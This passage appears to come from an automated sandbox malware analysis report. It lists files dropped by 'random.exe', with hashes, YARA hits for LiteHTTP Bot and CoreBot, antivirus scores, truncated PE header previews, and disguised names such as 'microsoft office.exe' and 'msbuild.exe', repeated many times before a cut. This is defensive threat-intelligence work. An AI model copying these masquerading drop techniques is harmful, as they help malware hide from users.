                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\google.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\google.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\internet explorer.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\internet explorer.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\java.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\java.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\jdownloader.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\jdownloader.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...

                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0

                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\microsoft office.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\microsoft office.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...

                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0

                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\microsoft.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\microsoft.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...

                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0

                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\microsoft.net.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\microsoft.net.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...

                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0

                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...

                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0

                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\mozilla maintenance service.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\mozilla maintenance service.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...

                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0

                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\msbuild.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\msbuild.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...

                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0

                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\msecache.exe, Author: Joe Security
